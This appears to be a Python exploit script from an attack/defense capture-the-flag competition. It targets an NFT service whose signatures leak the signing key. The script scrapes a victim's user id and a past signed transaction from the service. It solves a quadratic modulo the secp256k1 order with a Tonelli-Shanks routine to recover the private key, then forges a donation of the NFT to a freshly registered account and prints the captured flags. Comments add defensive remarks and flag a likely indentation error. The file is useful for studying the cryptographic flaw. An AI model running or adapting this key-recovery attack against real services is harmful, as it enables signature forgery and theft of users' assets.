service1-store2-vuln2-keyrecovery.py
#!/usr/bin/env python3
import sys
from hashlib import sha256
from Crypto.Util.number import inverse
from service1_common import *
def modular_sqrt(a, p):
    """Return one square root of ``a`` modulo ``p`` using Tonelli-Shanks.

    ``p`` is expected to be prime; nothing here checks that. The result is 0
    whenever ``a`` is not a non-zero quadratic residue modulo ``p`` (that
    includes ``a % p == 0``), so callers cannot tell "root is 0" apart from
    "no root exists" without checking the residue status themselves.
    """

    def euler_criterion(value):
        # 1 for a quadratic residue, -1 for a non-residue, 0 if p divides value.
        residue = pow(value, (p - 1) // 2, p)
        return -1 if residue == p - 1 else residue

    # Guard cases, kept in the same order as the original checks.
    if euler_criterion(a) != 1 or a == 0:
        return 0
    if p == 2:
        return p
    if p % 4 == 3:
        # For p = 3 (mod 4) a root is a single exponentiation away.
        return pow(a, (p + 1) // 4, p)

    # Factor p - 1 as odd_part * 2**two_power.
    odd_part, two_power = p - 1, 0
    while odd_part % 2 == 0:
        odd_part //= 2
        two_power += 1

    # Smallest quadratic non-residue modulo p, found by trial from 2 upwards.
    non_residue = 2
    while euler_criterion(non_residue) != -1:
        non_residue += 1

    root = pow(a, (odd_part + 1) // 2, p)
    residual = pow(a, odd_part, p)
    generator = pow(non_residue, odd_part, p)
    bound = two_power

    while True:
        # Count the squarings needed to bring `residual` down to 1.
        probe = residual
        squarings = 0
        for squarings in range(bound):
            if probe == 1:
                break
            probe = pow(probe, 2, p)

        if squarings == 0:
            # residual is already 1, so `root` squares to `a`.
            return root

        correction = pow(generator, 2 ** (bound - squarings - 1), p)
        generator = correction * correction % p
        root = root * correction % p
        residual = residual * generator % p
        bound = squarings
def compute_key(h, r, s):
    """Return both roots ``x`` of ``s*h*x**2 - r*x - h == 0 (mod q)``.

    ``h`` is a message hash and ``(r, s)`` the two halves of a signature, as
    passed in by the caller. The two values are ``(r +/- sqrt(delta)) / (2*s*h)``
    with ``delta = r*r + 4*h*h*s``, all modulo ``q``.

    ``modular_sqrt`` returns 0 when ``delta`` has no square root modulo ``q``;
    in that case both returned values are equal and neither is a real root.
    What ``inverse`` does when ``2*s*h`` is a multiple of ``q`` is not visible
    here.

    Defensive reading: the service's signing code is not shown on this page,
    but the fact that a solver of this shape exists means one published
    ``(message, r, s)`` triple pins the private scalar down to two candidates.
    The fix belongs in the signing routine (a vetted scheme with a secret
    per-signature nonce), not in access control around the transaction list.
    """
    # Order of the secp256k1 base point; prime, so a modular square root exists
    # for every quadratic residue.
    q = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
    discriminant = r * r + 4 * h * h * s
    root = modular_sqrt(discriminant, q)
    denominator_inverse = inverse(2 * s * h, q)
    plus_root = (r + root) * denominator_inverse % q
    minus_root = (r - root) * denominator_inverse % q
    return plus_root, minus_root
def exploit(ip, flag_id):
    """Run the key-recovery check against one service instance and return flags.

    Steps, as written below:
      1. Create a client with fresh random credentials and fetch the NFT page
         for ``flag_id``.
      2. Read the owner's user id from the first ``/user/...`` link in that page.
      3. Fetch that user's transaction list and take the first entry.
      4. Rebuild the JSON text for that entry, hash it with SHA-256, and split
         the hex signature into ``r`` (first 64 hex digits) and ``s`` (the rest).
      5. Pass ``(h, r, s)`` to ``compute_key`` and use a candidate scalar as the
         signing key for a second, newly registered client that asks the
         service to donate the NFT to itself.

    Returns the strings found by ``find_flag`` joined with newlines.

    Defensive reading: every input to step 5 is data the service hands to a
    client created with throwaway credentials (the owner id and a past
    transaction with its signature). Hiding the transaction list would only
    obscure the problem; the signature scheme itself must not let published
    signatures determine the key.

    ``Client``, ``Key``, ``randstr`` and ``find_flag`` are not defined in this
    file; presumably they come from ``from service1_common import *``.
    """
    u1, p1 = randstr(10), randstr(10)
    c = Client(ip, u1, p1)
    resp = c.view_nft(flag_id)
    # `re` is not imported in this file; presumably it is re-exported by the
    # star import from service1_common — confirm. If the page contains no
    # /user/ link, re.search returns None and the [1] raises TypeError.
    user_id = re.search('/user/(.*?)"', resp.text)[1]
    res = c.get_transactions_user(user_id)
    # c.close()
    # Assumes the list is non-empty and that its first entry was signed by the
    # owner's key — TODO confirm against the service's transaction ordering.
    trans = res[0]
    # The text must match byte-for-byte what the service hashed when signing
    # (key order, no whitespace); presumably mirrored from the service code.
    # The doubled `blob = blob =` is a harmless chained assignment.
    blob = blob = f"{{\"nft_id\":\"{trans['nft_id']}\",\"user_id\":\"{trans['to_user']}\"}}"
    sig = trans["signature"]
    # Signature is one hex string: 64 hex digits (256 bits) of r, then s.
    r, s = int(sig[:64], 16), int(sig[64:], 16)
    h = int(sha256(blob.encode()).hexdigest(), 16)
    x1, x2 = compute_key(h, r, s)
    for x in [x1, x2]:
        key = Key(x)
        u2, p2 = randstr(10), randstr(10)
        c2 = Client(ip, u2, p2, key)
        my_id = c2.register_user()
        resp = c2.donate_nft(flag_id, user_id, my_id)
        # c2.close()
        # NOTE(review): this listing lost its indentation. As reconstructed
        # here the return runs on the first pass, so the second candidate and
        # the trailing `return None` are never reached — confirm against the
        # original file.
        return "\n".join(find_flag(resp.text))
    return None
if __name__ == "__main__":
    # Command line: <script> TEAM_ID FLAG_ID. Both arguments are required;
    # a missing one surfaces as an IndexError from sys.argv.
    team_id, flag_id = sys.argv[1], sys.argv[2]
    # The team number is the third octet of the host address — presumably the
    # competition's per-team addressing plan inside the private 10.60.0.0/16 range.
    ip = f"10.60.{team_id}.1"
    print(exploit(ip, flag_id))